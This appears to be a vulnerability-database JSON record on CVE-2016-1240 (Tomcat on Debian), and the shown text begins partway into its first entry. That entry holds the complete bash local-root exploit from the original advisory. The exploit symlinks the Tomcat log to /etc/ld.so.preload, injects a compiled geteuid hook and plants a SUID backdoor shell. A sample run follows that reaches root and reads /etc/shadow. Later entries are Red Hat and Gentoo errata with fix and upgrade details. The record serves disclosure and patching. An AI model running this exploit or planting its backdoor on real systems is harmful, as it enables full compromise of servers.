harm.\r\n#\r\n\r\nBACKDOORSH=\"/bin/bash\"\r\nBACKDOORPATH=\"/tmp/tomcatrootsh\"\r\nPRIVESCLIB=\"/tmp/privesclib.so\"\r\nPRIVESCSRC=\"/tmp/privesclib.c\"\r\nSUIDBIN=\"/usr/bin/sudo\"\r\n\r\nfunction cleanexit {\r\n\t# Cleanup \r\n\techo -e \"\\n[+] Cleaning up...\"\r\n\trm -f $PRIVESCSRC\r\n\trm -f $PRIVESCLIB\r\n\trm -f $TOMCATLOG\r\n\ttouch $TOMCATLOG\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo -n > /etc/ld.so.preload 2>/dev/null\r\n\tfi\r\n\techo -e \"\\n[+] Job done. Exiting with code $1 \\n\"\r\n\texit $1\r\n}\r\n\r\nfunction ctrl_c() {\r\n echo -e \"\\n[+] Active exploitation aborted. 
Remember you can use -deferred switch for deferred exploitation.\"\r\n\tcleanexit 0\r\n}\r\n\r\n#intro \r\necho -e \"\\033[94m \\nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\\nCVE-2016-1240\\n\"\r\necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\"\r\n\r\n# Args\r\nif [ $# -lt 1 ]; then\r\n\techo -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_catalina.out [-deferred]\\n\"\r\n\texit 3\r\nfi\r\nif [ \"$2\" = \"-deferred\" ]; then\r\n\tmode=\"deferred\"\r\nelse\r\n\tmode=\"active\"\r\nfi\r\n\r\n# Priv check\r\necho -e \"\\n[+] Starting the exploit in [\\033[94m$mode\\033[0m] mode with the following privileges: \\n`id`\"\r\nid | grep -q tomcat\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] You need to execute the exploit as tomcat user! Exiting.\\n\"\r\n\texit 3\r\nfi\r\n\r\n# Set target paths\r\nTOMCATLOG=\"$1\"\r\nif [ ! -f $TOMCATLOG ]; then\r\n\techo -e \"\\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\\n\"\r\n\texit 3\r\nfi\r\necho -e \"\\n[+] Target Tomcat log file set to $TOMCATLOG\"\r\n\r\n# [ Deferred exploitation ]\r\n\r\n# Symlink the log file to /etc/default/locale file which gets executed daily on default\r\n# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.\r\n# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been\r\n# restarted and file owner gets changed.\r\nif [ \"$mode\" = \"deferred\" ]; then\r\n\trm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG\r\n\tif [ $? -ne 0 ]; then\r\n\t\techo -e \"\\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"\r\n\t\tcleanexit 3\r\n\tfi\r\n\techo -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\"\r\n\techo -e \"\\n[+] The current owner of the file is: \\n`ls -l /etc/default/locale`\"\r\n\techo -ne \"\\n[+] Keep an eye on the owner change on /etc/default/locale . 
After the Tomcat restart / system reboot\"\r\n\techo -ne \"\\n you'll be able to add arbitrary commands to the file which will get executed with root privileges\"\r\n\techo -ne \"\\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\\n\\n\"\r\n\texit 0\r\nfi\r\n\r\n# [ Active exploitation ]\r\n\r\ntrap ctrl_c INT\r\n# Compile privesc preload library\r\necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\"\r\ncat <<_solibeof_>$PRIVESCSRC\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <dlfcn.h>\r\nuid_t geteuid(void) {\r\n\tstatic uid_t (*old_geteuid)();\r\n\told_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\r\n\tif ( old_geteuid() == 0 ) {\r\n\t\tchown(\"$BACKDOORPATH\", 0, 0);\r\n\t\tchmod(\"$BACKDOORPATH\", 04777);\r\n\t\tunlink(\"/etc/ld.so.preload\");\r\n\t}\r\n\treturn old_geteuid();\r\n}\r\n_solibeof_\r\ngcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\r\n\tcleanexit 2;\r\nfi\r\n\r\n# Prepare backdoor shell\r\ncp $BACKDOORSH $BACKDOORPATH\r\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\"\r\n\r\n# Safety check\r\nif [ -f /etc/ld.so.preload ]; then\r\n\techo -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\"\r\n\tcleanexit 2\r\nfi\r\n\r\n# Symlink the log file to ld.so.preload\r\nrm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] 
Couldn't remove the $TOMCATLOG file or create a symlink.\"\r\n\tcleanexit 3\r\nfi\r\necho -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\"\r\n\r\n# Wait for Tomcat to re-open the logs\r\necho -ne \"\\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\"\r\necho -e \"\\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\"\r\nwhile :; do \r\n\tsleep 0.1\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo $PRIVESCLIB > /etc/ld.so.preload\r\n\t\tbreak;\r\n\tfi\r\ndone\r\n\r\n# /etc/ld.so.preload file should be owned by tomcat user at this point\r\n# Inject the privesc.so shared library to escalate privileges\r\necho $PRIVESCLIB > /etc/ld.so.preload\r\necho -e \"\\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \\n`ls -l /etc/ld.so.preload`\"\r\necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\r\necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\"\r\n\r\n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\r\necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\r\nsudo --help 2>/dev/null >/dev/null\r\n\r\n# Check for the rootshell\r\nls -l $BACKDOORPATH | grep rws | grep -q root\r\nif [ $? -eq 0 ]; then \r\n\techo -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\"\r\n\techo -e \"\\n\\033[94mPlease tell me you're seeing this too ;) \\033[0m\"\r\nelse\r\n\techo -e \"\\n[!] Failed to get root\"\r\n\tcleanexit 2\r\nfi\r\n\r\n# Execute the rootshell\r\necho -e \"\\n[+] Executing the rootshell $BACKDOORPATH now! 
\\n\"\r\n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\r\n$BACKDOORPATH -p\r\n\r\n# Job done.\r\ncleanexit 0\r\n\r\n--------------[ EOF ]--------------------\r\n\r\n\r\n\r\nExample exploit run:\r\n~~~~~~~~~~~~~~\r\n\r\ntomcat7@ubuntu:/tmp$ id\r\nuid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)\r\n\r\ntomcat7@ubuntu:/tmp$ lsb_release -a\r\nNo LSB modules are available.\r\nDistributor ID:\tUbuntu\r\nDescription:\tUbuntu 16.04 LTS\r\nRelease:\t16.04\r\nCodename:\txenial\r\n\r\ntomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat\r\nii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries\r\nii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine\r\nii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files\r\n\r\ntomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out \r\n \r\nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\r\nCVE-2016-1240\r\n\r\nDiscovered and coded by: \r\n\r\nDawid Golunski \r\nhttp://legalhackers.com \r\n\r\n[+] Starting the exploit in [active] mode with the following privileges: \r\nuid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)\r\n\r\n[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out\r\n\r\n[+] Compiling the privesc shared library (/tmp/privesclib.c)\r\n\r\n[+] Backdoor/low-priv shell installed at: \r\n-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh\r\n\r\n[+] Symlink created at: \r\nlrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload\r\n\r\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\r\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\r\n\r\n[+] Tomcat restarted. 
The /etc/ld.so.preload file got created with tomcat privileges: \r\n-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload\r\n\r\n[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload\r\n\r\n[+] The /etc/ld.so.preload file now contains: \r\n/tmp/privesclib.so\r\n\r\n[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!\r\n\r\n[+] Rootshell got assigned root SUID perms at: \r\n-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh\r\n\r\nPlease tell me you're seeing this too ;) \r\n\r\n[+] Executing the rootshell /tmp/tomcatrootsh now! \r\n\r\ntomcatrootsh-4.3# id\r\nuid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)\r\ntomcatrootsh-4.3# whoami\r\nroot\r\ntomcatrootsh-4.3# head -n3 /etc/shadow\r\nroot:$6$oaf[cut]:16912:0:99999:7:::\r\ndaemon:*:16912:0:99999:7:::\r\nbin:*:16912:0:99999:7:::\r\ntomcatrootsh-4.3# exit\r\nexit\r\n\r\n[+] Cleaning up...\r\n\r\n[+] Job done. Exiting with code 0 \r\n\r\n\r\n\r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n\r\nLocal attackers who have gained access to the tomcat user account (for example \r\nremotely via a vulnerable web application, or locally via weak webroot perms),\r\ncould escalate their privileges to root and fully compromise the affected system.\r\n\r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n\r\nThe following Debian package versions are affected:\r\n\r\nTomcat 8 <= 8.0.36-2\r\nTomcat 7 <= 7.0.70-2\r\nTomcat 6 <= 6.0.45+dfsg-1~deb8u1\r\n\r\nA more detailed list of affected packages can be found at:\r\n\r\nDebian:\r\nhttps://security-tracker.debian.org/tracker/CVE-2016-1240\r\n\r\nUbuntu:\r\nhttp://www.ubuntu.com/usn/usn-3081-1/\r\n\r\nOther systems that use Tomcat packages provided by Debian may also be affected.\r\n\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n\r\nDebian Security Team was contacted and has fixed affected upstream packages.\r\nUpdate to the latest tomcat packages provided by your distribution.\r\n \r\nIX. 
REFERENCES\r\n-------------------------\r\n\r\nhttp://legalhackers.com\r\n\r\nhttp://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html\r\n\r\nThe exploit's sourcecode\r\nhttp://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh\r\n\r\nCVE-2016-1240\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1240\r\n\r\nUbuntu Security Notice USN-3081-1:\r\nhttp://www.ubuntu.com/usn/usn-3081-1/\r\n\r\nDebian Security Advisory DSA-3669-1 (tomcat7):\r\nhttps://lists.debian.org/debian-security-announce/2016/msg00249.html\r\nhttps://www.debian.org/security/2016/dsa-3669\r\n\r\nDebian Security Advisory DSA-3670-1 (tomcat8):\r\nhttps://www.debian.org/security/2016/dsa-3670\r\n\r\nhttps://security-tracker.debian.org/tracker/CVE-2016-1240\r\n\r\n\r\nX. CREDITS\r\n-------------------------\r\n\r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\nhttp://legalhackers.com\r\n \r\nXI. REVISION HISTORY\r\n-------------------------\r\n\r\n30.09.2016 - Advisory released\r\n \r\nXII. LEGAL NOTICES\r\n-------------------------\r\n\r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40450/"}], "redhat": [{"lastseen": "2019-05-29T14:34:47", "bulletinFamily": "unix", "description": "Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. 
It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1.0 serves as a replacement for Red Hat JBoss Web Server 3.0.3, and includes enhancements.\n\nSecurity Fix(es):\n\n* It was reported that the Tomcat init script performed unsafe file handling, which could result in local privilege escalation. (CVE-2016-1240)\n\n* It was discovered that the Tomcat packages installed certain configuration files read by the Tomcat initialization script as writeable to the tomcat group. A member of the group or a malicious web application deployed on Tomcat could use this flaw to escalate their privileges. (CVE-2016-6325)\n\n* The JmxRemoteLifecycleListener was not updated to take account of Oracle's fix for CVE-2016-3427. JMXRemoteLifecycleListener is only included in EWS 2.x and JWS 3.x source distributions. If you deploy a Tomcat instance built from source, using the EWS 2.x, or JWS 3.x distributions, an attacker could use this flaw to launch a remote code execution attack on your deployed instance. (CVE-2016-8735)\n\n* A denial of service vulnerability was identified in Commons FileUpload that occurred when the length of the multipart boundary was just below the size of the buffer (4096 bytes) used to read the uploaded file if the boundary was the typical tens of bytes long. (CVE-2016-3092)\n\n* It was discovered that the code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack, or obtain sensitive information from requests other than their own. 
(CVE-2016-6816)\n\n* A bug was discovered in the error handling of the send file code for the NIO HTTP connector. This led to the current Processor object being added to the Processor cache multiple times allowing information leakage between requests including, and not limited to, session ID and the response body. (CVE-2016-8745)\n\n* The Realm implementations did not process the supplied password if the supplied user name did not exist. This made a timing attack possible to determine valid user names. Note that the default configuration includes the LockOutRealm which makes exploitation of this vulnerability harder. (CVE-2016-0762)\n\n* It was discovered that a malicious web application could bypass a configured SecurityManager via a Tomcat utility method that was accessible to web applications. (CVE-2016-5018)\n\n* It was discovered that when a SecurityManager is configured Tomcat's system property replacement feature for configuration files could be used by a malicious web application to bypass the SecurityManager and read system properties that should not be visible. (CVE-2016-6794)\n\n* It was discovered that a malicious web application could bypass a configured SecurityManager via manipulation of the configuration parameters for the JSP Servlet. (CVE-2016-6796)\n\n* It was discovered that it was possible for a web application to access any global JNDI resource whether an explicit ResourceLink had been configured or not. (CVE-2016-6797)\n\nThe CVE-2016-6325 issue was discovered by Red Hat Product Security.\n\nEnhancement(s):\n\n* This enhancement update adds the Red Hat JBoss Web Server 3.1.0. 
These packages provide a number of enhancements over the previous version of Red Hat JBoss Web Server.\n\nUsers of Red Hat JBoss Web Server are advised to upgrade to these updated packages, which add this enhancement.", "modified": "2017-07-25T00:20:14", "published": "2017-03-07T23:57:09", "id": "RHSA-2017:0457", "href": "https://access.redhat.com/errata/RHSA-2017:0457", "type": "redhat", "title": "(RHSA-2017:0457) Important: Red Hat JBoss Web Server security and enhancement update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:44", "bulletinFamily": "unix", "description": "Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1.0 serves as a replacement for Red Hat JBoss Web Server 3.0.3, and includes enhancements.\n\nSecurity Fix(es):\n\n* It was reported that the Tomcat init script performed unsafe file handling, which could result in local privilege escalation. (CVE-2016-1240)\n\n* It was discovered that the Tomcat packages installed certain configuration files read by the Tomcat initialization script as writeable to the tomcat group. A member of the group or a malicious web application deployed on Tomcat could use this flaw to escalate their privileges. (CVE-2016-6325)\n\n* The JmxRemoteLifecycleListener was not updated to take account of Oracle's fix for CVE-2016-3427. JMXRemoteLifecycleListener is only included in EWS 2.x and JWS 3.x source distributions. If you deploy a Tomcat instance built from source, using the EWS 2.x, or JWS 3.x distributions, an attacker could use this flaw to launch a remote code execution attack on your deployed instance. 
(CVE-2016-8735)\n\n* A denial of service vulnerability was identified in Commons FileUpload that occurred when the length of the multipart boundary was just below the size of the buffer (4096 bytes) used to read the uploaded file if the boundary was the typical tens of bytes long. (CVE-2016-3092)\n\n* It was discovered that the code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack, or obtain sensitive information from requests other than their own. (CVE-2016-6816)\n\n* A bug was discovered in the error handling of the send file code for the NIO HTTP connector. This led to the current Processor object being added to the Processor cache multiple times allowing information leakage between requests including, and not limited to, session ID and the response body. (CVE-2016-8745)\n\n* The Realm implementations did not process the supplied password if the supplied user name did not exist. This made a timing attack possible to determine valid user names. Note that the default configuration includes the LockOutRealm which makes exploitation of this vulnerability harder. (CVE-2016-0762)\n\n* It was discovered that a malicious web application could bypass a configured SecurityManager via a Tomcat utility method that was accessible to web applications. (CVE-2016-5018)\n\n* It was discovered that when a SecurityManager is configured Tomcat's system property replacement feature for configuration files could be used by a malicious web application to bypass the SecurityManager and read system properties that should not be visible. 
(CVE-2016-6794)\n\n* It was discovered that a malicious web application could bypass a configured SecurityManager via manipulation of the configuration parameters for the JSP Servlet. (CVE-2016-6796)\n\n* It was discovered that it was possible for a web application to access any global JNDI resource whether an explicit ResourceLink had been configured or not. (CVE-2016-6797)\n\nThe CVE-2016-6325 issue was discovered by Red Hat Product Security.\n\nEnhancement(s):\n\n* This enhancement update adds the Red Hat JBoss Web Server 3.1.0 packages to Red Hat Enterprise Linux 7. These packages provide a number of enhancements over the previous version of Red Hat JBoss Web Server. (JIRA#JWS-268)", "modified": "2018-03-19T16:14:02", "published": "2015-11-13T00:12:07", "id": "RHSA-2017:0456", "href": "https://access.redhat.com/errata/RHSA-2017:0456", "type": "redhat", "title": "(RHSA-2017:0456) Important: Red Hat JBoss Web Server 3.1.0 security and enhancement update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:45", "bulletinFamily": "unix", "description": "Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1.0 serves as a replacement for Red Hat JBoss Web Server 3.0.3, and includes enhancements.\n\nSecurity Fix(es):\n\n* It was reported that the Tomcat init script performed unsafe file handling, which could result in local privilege escalation. (CVE-2016-1240)\n\n* It was discovered that the Tomcat packages installed certain configuration files read by the Tomcat initialization script as writeable to the tomcat group. 
A member of the group or a malicious web application deployed on Tomcat could use this flaw to escalate their privileges. (CVE-2016-6325)\n\n* The JmxRemoteLifecycleListener was not updated to take account of Oracle's fix for CVE-2016-3427. JMXRemoteLifecycleListener is only included in EWS 2.x and JWS 3.x source distributions. If you deploy a Tomcat instance built from source, using the EWS 2.x, or JWS 3.x distributions, an attacker could use this flaw to launch a remote code execution attack on your deployed instance. (CVE-2016-8735)\n\n* A denial of service vulnerability was identified in Commons FileUpload that occurred when the length of the multipart boundary was just below the size of the buffer (4096 bytes) used to read the uploaded file if the boundary was the typical tens of bytes long. (CVE-2016-3092)\n\n* It was discovered that the code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack, or obtain sensitive information from requests other than their own. (CVE-2016-6816)\n\n* A bug was discovered in the error handling of the send file code for the NIO HTTP connector. This led to the current Processor object being added to the Processor cache multiple times allowing information leakage between requests including, and not limited to, session ID and the response body. (CVE-2016-8745)\n\n* The Realm implementations did not process the supplied password if the supplied user name did not exist. This made a timing attack possible to determine valid user names. Note that the default configuration includes the LockOutRealm which makes exploitation of this vulnerability harder. 
(CVE-2016-0762)\n\n* It was discovered that a malicious web application could bypass a configured SecurityManager via a Tomcat utility method that was accessible to web applications. (CVE-2016-5018)\n\n* It was discovered that when a SecurityManager is configured Tomcat's system property replacement feature for configuration files could be used by a malicious web application to bypass the SecurityManager and read system properties that should not be visible. (CVE-2016-6794)\n\n* It was discovered that a malicious web application could bypass a configured SecurityManager via manipulation of the configuration parameters for the JSP Servlet. (CVE-2016-6796)\n\n* It was discovered that it was possible for a web application to access any global JNDI resource whether an explicit ResourceLink had been configured or not. (CVE-2016-6797)\n\nThe CVE-2016-6325 issue was discovered by Red Hat Product Security.\n\nEnhancement(s):\n\nThis enhancement update adds the Red Hat JBoss Web Server 3.1.0 packages to Red Hat Enterprise Linux 6. These packages provide a number of enhancements over the previous version of Red Hat JBoss Web Server. (JIRA#JWS-267)\n\nUsers of Red Hat JBoss Web Server are advised to upgrade to these updated packages, which add this enhancement.", "modified": "2018-06-07T02:42:54", "published": "2015-11-12T23:40:07", "id": "RHSA-2017:0455", "href": "https://access.redhat.com/errata/RHSA-2017:0455", "type": "redhat", "title": "(RHSA-2017:0455) Important: Red Hat JBoss Web Server 3.1.0 security and enhancement update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2017-05-28T22:26:23", "bulletinFamily": "unix", "description": "### Background\n\nApache Tomcat is a Servlet-3.0/JSP-2.2 Container.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Tomcat. Please review the CVE identifiers referenced below for details. 
\n\n### Impact\n\nA remote attacker may be able to cause a Denial of Service condition, obtain sensitive information, bypass protection mechanisms and authentication restrictions. \n\nA local attacker, who is the tomcat system user or belongs to the tomcat group, could potentially escalate privileges. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Apache Tomcat users have to manually check their Tomcat runscripts to make sure that they don\u2019t use an old, vulnerable runscript. In addition: \n\nAll Apache Tomcat 7 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/tomcat-7.0.70:7\"\n \n\nAll Apache Tomcat 8 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/tomcat-8.0.36:8\"", "modified": "2017-05-18T00:00:00", "published": "2017-05-18T00:00:00", "href": "https://security.gentoo.org/glsa/201705-09", "id": "GLSA-201705-09", "title": "Apache Tomcat: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}
